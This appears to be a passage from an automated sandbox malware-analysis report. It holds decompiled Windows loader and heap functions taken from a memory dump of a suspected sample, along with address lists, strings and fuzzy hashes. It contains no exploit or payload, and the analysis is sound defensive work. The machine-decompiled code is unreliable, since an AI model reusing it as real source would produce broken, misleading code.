						_push(0x1000);
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E36B22B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E36AF3C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E36B9EFD3(_t110, _t136, _v36, _v40, "true");
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E36AF3C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E36AF3C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E36B9F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E36AF3C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E36AF3C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E36B9F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E36B38140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_push("true");
				_pop(_t130);
				goto L3;
			}

0x36adf5cf
0x36adf5d9
0x36adf5e0
0x36adf5e3
0x36adf607
0x36b3e162
0x36b3e167
0x36b3e167
0x36b3e16d
0x36b3e173
0x36b3e177
0x36b3e2dd
0x36b3e2e2
0x36b3e17d
0x36b3e192
0x36b3e197
0x36b3e2e8
0x36b3e2ec
0x36b3e2f0
0x36b3e2f7
0x36b3e2ff
0x36adf6ba
0x36adf6c0
0x36adf6c0
0x36adf614
0x36b3e19d
0x36b3e19f
0x36b3e1a0
0x36b3e1a2
0x36b3e1a8
0x36b3e1a9
0x36b3e1ab
0x36b3e1ac
0x36b3e1ae
0x36b3e1b3
0x36b3e1b5
0x36b3e1c8
0x36b3e1d6
0x00000000
0x36b3e1d6
0x36b3e1b7
0x36b3e1bc
0x00000000
0x00000000
0x36b3e1be
0x36b3e1c2
0x36adf61d
0x36adf61e
0x36adf627
0x36adf628
0x36adf62e
0x36adf62f
0x36adf631
0x36adf636
0x36adf63a
0x00000000
0x00000000
0x36adf640
0x36adf645
0x36adf64c
0x36b3e1e9
0x36adf652
0x36adf652
0x36adf652
0x36adf657
0x36b3e1f3
0x36b3e1f9
0x36b3e200
0x36b3e212
0x36b3e212
0x36b3e200
0x36adf661
0x36adf667
0x36adf674
0x36b3e225
0x36adf67a
0x36adf67a
0x36adf67a
0x36adf67f
0x36b3e22f
0x36b3e235
0x36b3e23c
0x36b3e247
0x36b3e249
0x36b3e254
0x36b3e254
0x36b3e254
0x36b3e26f
0x36b3e26f
0x36b3e23c
0x36adf685
0x36adf68a
0x36adf691
0x36b3e282
0x36adf697
0x36adf697
0x36adf697
0x36adf69c
0x36b3e291
0x36b3e293
0x36b3e29e
0x36b3e29e
0x36b3e29e
0x36b3e2b9
0x36b3e2b9
0x36adf6a2
0x36adf6a8
0x36adf6ad
0x36b3e2d0
0x36b3e2d5
0x36b3e2d5
0x36adf6b5
0x36adf6b8
0x00000000
0x36adf6b8
0x00000000
0x36b3e1c2
0x36adf61a
0x36adf61a
0x36adf61c
0x00000000

Strings

HEAP[%wZ]: , xrefs: 36B3E18D
HEAP: , xrefs: 36B3E2DD
`, xrefs: 36B3E1B7
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36B3E2F2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: a676df2f0ee73d2843bcaf863392e9510169a19e6ac037d66530512a2fa7b196
Instruction ID: 7d2492a02f5ec21a99728d69ae4c6191016d91e650bd6bf739e665e665ac237f
Opcode Fuzzy Hash: a676df2f0ee73d2843bcaf863392e9510169a19e6ac037d66530512a2fa7b196
Instruction Fuzzy Hash: 2A6144756057A0AFE311CB24CD64F5BB7E8EF80794F15046AFD548B291CB34E805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 36AD90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 36B3B82F, 36B3B86C
HEAP: , xrefs: 36B3B83C, 36B3B879
VirtualProtect Failed 0x%p %x, xrefs: 36B3B849
VirtualQuery Failed 0x%p %x, xrefs: 36B3B886

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 52f8a4c9e70cbb07237103402edb6d4e69fd744c32597f9ac85421adf2523eb6
Instruction ID: 3170aa7d888b914a95d59e27c773fb365f6da9b7fb6613b6d37928c248b3c664
Opcode Fuzzy Hash: 52f8a4c9e70cbb07237103402edb6d4e69fd744c32597f9ac85421adf2523eb6
Instruction Fuzzy Hash: CD31B276A01219EFDB41DB65CC84F9ABBF8FB457A0F2140A5FC14AB291D734E940CE61

Uniqueness

Uniqueness Score: -1.00%

Function 36B6166E Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E36B6166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E36B29EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E36B29EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E36B29EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E36B29EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}

0x36b6167e
0x36b61680
0x36b61689
0x36b61691
0x36b61699
0x36b616a0
0x36b616a6
0x36b616b2
0x36b616b7
0x36b616ba
0x36b616bc
0x36b616c8
0x36b616ca
0x36b616d2
0x36b616d7
0x36b616dc
0x00000000
0x00000000
0x36b616e0
0x36b616ea
0x36b616ef
0x36b616f2
0x36b616f2
0x36b616f4
0x36b616f9
0x36b61703
0x36b61708
0x36b6170b
0x36b6170b
0x36b61710
0x36b61719
0x36b6171f
0x36b61720
0x36b61729
0x00000000
0x00000000
0x36b6172b
0x00000000
0x00000000
0x00000000
0x00000000
0x36b61710
0x00000000
0x36b616ca
0x36b6172d
0x36b6172d
0x36b61733
0x36b61741
0x36b61741
0x36b61746
0x36b6174a

Strings

.txt2, xrefs: 36B616FD
stxt371, xrefs: 36B616CC
.txt, xrefs: 36B616E4
BoG_ *90.0&!! Yy>, xrefs: 36B61693

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
API String ID: 0-1880532218
Opcode ID: f6875f1c0be60a9c721b8f0c0f45ea081444ff61e734471bc05f446edff25abd
Instruction ID: 26925d8a2625f828fecafd04f7c70193ad65e97d4871bb699083c49b88fa5e06
Opcode Fuzzy Hash: f6875f1c0be60a9c721b8f0c0f45ea081444ff61e734471bc05f446edff25abd
Instruction Fuzzy Hash: C22136BAE01210ABD7018B6EDD51BAABBF5FF45748F184069E889E7341EA38D905CF41

Uniqueness

Uniqueness Score: -1.00%

Function 36AE7072 Relevance: 4.7, APIs: 3, Instructions: 158
timeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E36AE7072(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				signed int* _t58;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t106;
				void* _t112;
				intOrPtr _t113;

				_t112 = __edx;
				_v24 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t113 =  *((intOrPtr*)(__edx + 0x58));
				if(_t113 != 0) {
					_push( &_v16);
					_push(0);
					_push(0);
					E36B185E0(_t86, __edx, __edx, _t113, __eflags);
				}
				_t87 = _t112 + 0x8c;
				_t92 =  *_t87;
				do {
					_t106 = _t92;
					_t51 = _t92 >> 1;
					if(_t51 == 0) {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
					} else {
						_v12 = 1;
						_v8 = 1;
						if((_t92 & 0x00000001 | _t51 * 0x00000002 - 0x00000002) < 2) {
							_v8 = _v8 & 0x00000000;
						}
					}
					asm("lock cmpxchg [ebx], ecx");
					_t92 = _t106;
				} while (_t92 != _t106);
				_t88 = _t87 | 0xffffffff;
				if(_t113 != 0) {
					__eflags = _v12;
					if(__eflags != 0) {
						__eflags = E36B02120(_t88, _t92, 0, _t113);
						if(__eflags >= 0) {
							_t82 = _v24;
							_t33 = _t82 + 0x50;
							 *_t33 =  *(_t82 + 0x50) | 0x00000100;
							__eflags =  *_t33;
							 *((intOrPtr*)(_t82 + 0x64)) = _t113;
						} else {
							_v12 = _v12 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_v20 = 1;
						}
					}
					_push(_v16);
					_push(0);
					E36B1A6D0(_t88, _t112, _t113, __eflags);
					__eflags = _v20;
					if(_v20 != 0) {
						E36B0DB40(_t112 + 0x20, _t88, 0);
						E36BB4600(_t112);
					}
				}
				if(_v8 != 0) {
					_push(2);
					asm("lock xadd [edi], eax");
					_t55 = E36AF3C40();
					__eflags = _t55;
					if(_t55 != 0) {
						_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t58 = 0x7ffe0386;
					}
					__eflags =  *_t58;
					if( *_t58 != 0) {
						E36BB4BE0( *((intOrPtr*)(_t112 + 0x5c)), _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x30)),  *((intOrPtr*)(_t112 + 0x34)),  *((intOrPtr*)(_t112 + 0x3c)));
					}
					E36AF1C8F(_t88, _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x5c)), _t112,  *((intOrPtr*)(_t112 + 0x74)), 0);
					asm("lock xadd [edi], eax");
					if(__eflags == 0) {
						 *0x36bd91e0(_t112);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
					}
				}
				if(_a4 != 0) {
					__eflags = E36AE1F36(0);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t112 + 0x70)) = _v0;
						asm("lock xadd [edi], eax");
						if(__eflags == 0) {
							 *0x36bd91e0(_t112);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
						}
					}
				}
				if(_v12 != 0) {
					E36AE7007(_v24, _t112);
					return 1;
				}
				asm("lock xadd [edi], ebx");
				__eflags = _t88 == 1;
				if(_t88 == 1) {
					 *0x36bd91e0(_t112);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
				}
				return 0;
			}

0x36ae707d
0x36ae707f
0x36ae7084
0x36ae7087
0x36ae708a
0x36ae708f
0x36b41534
0x36b41535
0x36b41536
0x36b41537
0x36b41537
0x36ae7095
0x36ae709b
0x36ae709d
0x36ae709f
0x36ae70a1
0x36ae70a3
0x36b41541
0x36b41545
0x36ae70a9
0x36ae70b0
0x36ae70bf
0x36ae70c5
0x36ae70c7
0x36ae70cb
0x36ae70c5
0x36ae70cf
0x36ae70d3
0x36ae70d5
0x36ae70d9
0x36ae70de
0x36b41551
0x36b41555
0x36b4155f
0x36b41561
0x36b41574
0x36b41577
0x36b41577
0x36b41577
0x36b4157e
0x36b41563
0x36b41563
0x36b41567
0x36b4156b
0x36b4156b
0x36b41561
0x36b41581
0x36b41584
0x36b41586
0x36b4158b
0x36b4158f
0x36b4159c
0x36b415a2
0x36b415a2
0x36b4158f
0x36ae70e8
0x36ae710e
0x36ae7111
0x36ae7115
0x36ae711a
0x36ae711c
0x36b415b5
0x36ae7122
0x36ae7122
0x36ae7122
0x36ae7129
0x36ae712b
0x36b415ce
0x36b415ce
0x36ae713c
0x36ae7143
0x36ae7147
0x36b415e0
0x36b415e6
0x36b415e6
0x36ae7147
0x36ae70ee
0x36ae7157
0x36ae7159
0x36ae715e
0x36ae7163
0x36ae7167
0x36b415f5
0x36b415fb
0x36b415fb
0x36ae7167
0x36ae7159
0x36ae70f4
0x36ae70ff
0x00000000
0x36ae7106
0x36b41602
0x36b41606
0x36b41607
0x36b41611
0x36b41617
0x36b41617
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B415E0
RtlDebugPrintTimes.NTDLL ref: 36B415F5

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a2acdb5c5ab674300eb15232852164bf81943f475290c20133dedffa568e15e6
Instruction ID: 4fafabb39c0b389a129a298bb0d4e36e3d472bc8294889566fbb88c3c83e26f5
Opcode Fuzzy Hash: a2acdb5c5ab674300eb15232852164bf81943f475290c20133dedffa568e15e6
Instruction Fuzzy Hash: 7D51EC34E00725EFEB06EB65C858BADBBB4FF44356F20412AEA0297290DB74D911DF91

Uniqueness

Uniqueness Score: -1.00%

Function 36B73608 Relevance: 4.1, Strings: 3, Instructions: 398
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E36B73608(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t140;
				short _t141;
				signed char* _t146;
				char* _t147;
				signed char* _t149;
				intOrPtr _t150;
				signed short _t167;
				intOrPtr _t185;
				signed int _t193;
				intOrPtr _t201;
				void* _t204;
				void* _t205;
				signed char* _t206;
				signed char* _t213;
				intOrPtr _t216;
				signed int _t217;
				intOrPtr* _t218;
				signed int _t220;
				short _t223;
				signed short _t230;
				char* _t232;
				intOrPtr* _t235;
				void* _t239;
				void* _t258;
				intOrPtr _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				char* _t271;
				char* _t274;
				signed int _t275;
				void* _t279;
				void* _t280;

				_push(0x45c);
				_push(0x36bbcf20);
				E36B37C40(__ebx, __edi, __esi);
				 *(_t280 - 0x430) = __edx;
				_t266 = __ecx;
				 *((intOrPtr*)(_t280 - 0x428)) = __ecx;
				 *((intOrPtr*)(_t280 - 0x440)) =  *((intOrPtr*)(_t280 + 8));
				 *((intOrPtr*)(_t280 - 0x450)) =  *((intOrPtr*)(_t280 + 0x10));
				 *((intOrPtr*)(_t280 - 0x44c)) =  *((intOrPtr*)(_t280 + 0x14));
				 *((intOrPtr*)(_t280 - 0x444)) =  *((intOrPtr*)(_t280 + 0x18));
				 *((intOrPtr*)(_t280 - 0x434)) =  *((intOrPtr*)(_t280 + 0x1c));
				_t223 = 0x42;
				 *((short*)(_t280 - 0x43c)) = _t223;
				_push("true");
				_pop(_t140);
				 *((short*)(_t280 - 0x43a)) = _t140;
				 *(_t280 - 0x438) = L"LdrpResSearchResourceHandle Enter";
				_push("true");
				_pop(_t141);
				 *((short*)(_t280 - 0x464)) = _t141;
				 *((short*)(_t280 - 0x462)) = _t223;
				 *(_t280 - 0x460) = L"LdrpResSearchResourceHandle Exit";
				_t271 = 0;
				E36B28F40(_t280 - 0xc8, 0, _t141 + 0x6c);
				if(E36AF3C40() == 0) {
					_t146 = 0x7ffe0385;
				} else {
					_t146 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t146 & 0x00000001) == 0) {
					_t213 = 0x7ffe0384;
				} else {
					_t205 = E36AF3C40();
					_t213 = 0x7ffe0384;
					if(_t205 == 0) {
						_t206 = 0x7ffe0384;
					} else {
						_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					E36B6FC01(_t280 - 0x43c,  *_t206 & 0x000000ff);
				}
				if(_t266 == 0 || _t266 == 0xffffffff) {
					_t267 = 0xc000000d;
					goto L16;
				} else {
					 *(_t280 - 0x42c) =  *(_t280 - 0x430) & 0x00001000;
					_t150 = E36B7314A(_t266, _t280 - 0x45c);
					if(_t150 >= 0 ||  *(_t280 - 0x42c) == _t271) {
						_t150 = E36B73592(_t266, _t280 - 0x210, "true");
						if(_t150 >= 0) {
							if( *((intOrPtr*)(_t280 - 0x210)) == 0x5a4d) {
								_t269 =  *((intOrPtr*)(_t280 - 0x1d4));
								if( *(_t280 - 0x42c) == _t271) {
									L22:
									_t150 = E36B73592( *((intOrPtr*)(_t280 - 0x428)), _t280 - 0x1d0, "true");
									if(_t150 >= 0) {
										if( *((intOrPtr*)(_t280 - 0x1d0)) != 0x4550) {
											goto L15;
										} else {
											if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x10b) {
												if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x20b ||  *((intOrPtr*)(_t280 - 0x1cc)) != 0x200 &&  *((intOrPtr*)(_t280 - 0x1cc)) != 0x8664) {
													goto L15;
												} else {
													if( *((intOrPtr*)(_t280 - 0x14c)) <= 2 ||  *((intOrPtr*)(_t280 - 0x134)) == _t271) {
														goto L30;
													} else {
														_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
														if(_t230 == 0 || _t230 < 0x88) {
															goto L15;
														} else {
															_t216 =  *((intOrPtr*)(_t280 - 0x138));
															goto L43;
														}
													}
												}
											} else {
												_t201 =  *((intOrPtr*)(_t280 - 0x1cc));
												if(_t201 == 0x14c || _t201 == 0x1c0 || _t201 == 0x1c2 || _t201 == 0x1c4) {
													if( *((intOrPtr*)(_t280 - 0x15c)) > 2) {
														if( *((intOrPtr*)(_t280 - 0x144)) == _t271) {
															goto L30;
														} else {
															_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
															if(_t230 == 0 || _t230 < 0x78) {
																goto L15;
															} else {
																_t216 =  *((intOrPtr*)(_t280 - 0x148));
																L43:
																if(_t216 != 0) {
																	_t167 =  *(_t280 - 0x1ca);
																	if(_t167 != 0) {
																		_t273 = (_t167 & 0x0000ffff) * 0x28;
																		if((_t230 & 0x0000ffff) + 0x18 + (_t167 & 0x0000ffff) * 0x28 + _t269 <=  *((intOrPtr*)(_t280 - 0x45c))) {
																			_t147 = E36AF5D90(_t230,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t273);
																			 *(_t280 - 0x420) = _t147;
																			 *(_t280 - 0x448) = _t147;
																			if(_t147 != 0) {
																				_t274 =  *(_t280 - 0x420);
																				_t267 = E36B73592( *((intOrPtr*)(_t280 - 0x428)), _t274, _t273);
																				 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																				if(_t267 < 0) {
																					L59:
																					_t147 =  *(_t280 - 0x420);
																					goto L60;
																				} else {
																					_t232 = _t274;
																					 *(_t280 - 0x438) = _t274;
																					_t258 = 0;
																					_t275 =  *(_t280 - 0x1ca) & 0x0000ffff;
																					if(_t275 != 0) {
																						while(_t216 < _t232[0xc] || _t216 >= _t232[0x10] + _t232[0xc]) {
																							_t232 =  &(_t232[0x28]);
																							_t258 = _t258 + 1;
																							if(_t258 < _t275) {
																								continue;
																							}
																							break;
																						}
																						 *(_t280 - 0x438) = _t232;
																					}
																					if(_t258 < _t275) {
																						_t278 = _t232[0x14] - _t232[0xc] + _t216;
																						if(_t232[0x14] - _t232[0xc] + _t216 == 0) {
																							goto L58;
																						} else {
																							_t217 =  *((intOrPtr*)(_t280 - 0x428));
																							_t267 = E36B73C37(_t217, _t278);
																							 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																							if(_t267 < 0) {
																								goto L59;
																							} else {
																								if( *((intOrPtr*)(_t280 + 0xc)) != 3) {
																									L73:
																									 *((short*)(_t280 - 0x424)) = 0;
																									_t260 = _t217;
																									_t267 = E36AEE9A0(0, _t217,  *((intOrPtr*)(_t280 - 0x45c)), _t278, _t280 - 0x1d0,  *(_t280 - 0x438),  *((intOrPtr*)(_t280 - 0x440)),  *((intOrPtr*)(_t280 + 0xc)), _t280 - 0x418,  *((intOrPtr*)(_t280 - 0x450)),  *((intOrPtr*)(_t280 - 0x44c)),  *(_t280 - 0x430), _t280 - 0x424);
																									 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																									if(_t267 < 0) {
																										goto L59;
																									} else {
																										_t235 =  *((intOrPtr*)(_t280 - 0x434));
																										if(_t235 == 0) {
																											goto L59;
																										} else {
																											_t182 =  *((intOrPtr*)(_t280 - 0x424));
																											_t271 = 0;
																											if( *((intOrPtr*)(_t280 - 0x424)) != 0) {
																												 *((intOrPtr*)(_t280 - 0x468)) = _t280 - 0xc8;
																												 *((short*)(_t280 - 0x46a)) = 0xac;
																												_t267 = E36B05A40(_t260, _t182 & 0x0000ffff, _t280 - 0x46c, 2, 0);
																												 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																												if(_t267 < 0) {
																													goto L85;
																												} else {
																													_t218 = _t280 - 0xc8;
																													_t239 = _t218 + 2;
																													do {
																														_t185 =  *_t218;
																														_t218 = _t218 + 2;
																													} while (_t185 != 0);
																													_t220 = _t218 - _t239 >> 1;
																													_t235 =  *((intOrPtr*)(_t280 - 0x434));
																													goto L81;
																												}
																											} else {
																												_t220 = 0;
																												L81:
																												 *(_t280 - 4) = _t271;
																												if(_t220 >=  *_t235) {
																													L84:
																													 *_t235 = _t220 + 1;
																													_t267 = 0xc0000023;
																													 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000023;
																													 *(_t280 - 4) = 0xfffffffe;
																													L85:
																													_t147 =  *(_t280 - 0x420);
																													goto L61;
																												} else {
																													_t187 =  *((intOrPtr*)(_t280 - 0x444));
																													if( *((intOrPtr*)(_t280 - 0x444)) == 0) {
																														goto L84;
																													} else {
																														_t279 = _t220 + _t220;
																														E36B288C0(_t187, _t280 - 0xc8, _t279);
																														 *((intOrPtr*)( *((intOrPtr*)(_t280 - 0x434)))) = _t220 + 1;
																														 *((short*)(_t279 +  *((intOrPtr*)(_t280 - 0x444)))) = 0;
																														 *(_t280 - 4) = 0xfffffffe;
																														goto L59;
																													}
																												}
																											}
																										}
																									}
																								} else {
																									 *((short*)(_t280 - 0x418)) = 0;
																									_t193 =  *( *((intOrPtr*)(_t280 - 0x440)) + 8) & 0x0000ffff;
																									_t243 =  *(_t280 - 0x430);
																									if(( *(_t280 - 0x430) & 0x00000020) == 0) {
																										_t267 = E36AEA2E0(0, 0, _t193, _t243, _t280 - 0x418);
																										 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																										if(_t267 >= 0 ||  *(_t280 - 0x42c) == 0) {
																											goto L73;
																										} else {
																											goto L59;
																										}
																									} else {
																										 *((short*)(_t280 - 0x418)) = 1;
																										 *((short*)(_t280 - 0x414)) = 0;
																										goto L73;
																									}
																								}
																							}
																						}
																						goto L93;
																					} else {
																						L58:
																						_t267 = 0xc000007b;
																						 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																						goto L59;
																					}
																				}
																			} else {
																				_t267 = 0xc0000017;
																				 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000017;
																				L60:
																				_t271 = 0;
																			}
																		} else {
																			_t271 = 0;
																			goto L46;
																		}
																	} else {
																		L46:
																		_t267 = 0xc000007b;
																		 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																		_t147 = _t271;
																	}
																	L61:
																	_t213 = 0x7ffe0384;
																	goto L62;
																} else {
																	_t150 = 0xc0000089;
																}
															}
														}
													} else {
														L30:
														_t267 = 0xc0000089;
														goto L16;
													}
												} else {
													goto L15;
												}
											}
										}
									}
								} else {
									if(E36AD94A3(_t269, 0xf8, _t280 - 0x448) < 0 || _t269 > 0x10000000) {
										goto L15;
									} else {
										_t204 = _t269 + 0xf8;
										if(_t204 <= _t269 || _t204 >=  *((intOrPtr*)(_t280 - 0x45c))) {
											goto L15;
										} else {
											goto L22;
										}
									}
								}
							} else {
								L15:
								_t267 = 0xc000007b;
								L16:
								 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
								_t147 = _t271;
								L62:
								if(_t147 != 0) {
									E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t271, _t147);
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(E36AF3C40() == 0) {
									_t149 = 0x7ffe0385;
								} else {
									_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(( *_t149 & 0x00000001) != 0) {
									if(E36AF3C40() != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										_t267 =  *((intOrPtr*)(_t280 - 0x41c));
									}
									E36B6FC01(_t280 - 0x464,  *_t213 & 0x000000ff);
								}
								_t150 = _t267;
							}
						}
					}
				}
				L93:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 - 0x10));
				return _t150;
			}

0x36b73608
0x36b7360d
0x36b73612
0x36b73617
0x36b7361d
0x36b7361f
0x36b73628
0x36b73631
0x36b7363a
0x36b73643
0x36b7364c
0x36b73654
0x36b73655
0x36b7365c
0x36b7365e
0x36b7365f
0x36b73666
0x36b73670
0x36b73672
0x36b73673
0x36b7367a
0x36b73681
0x36b7368f
0x36b73699
0x36b736a8
0x36b736ba
0x36b736aa
0x36b736b3
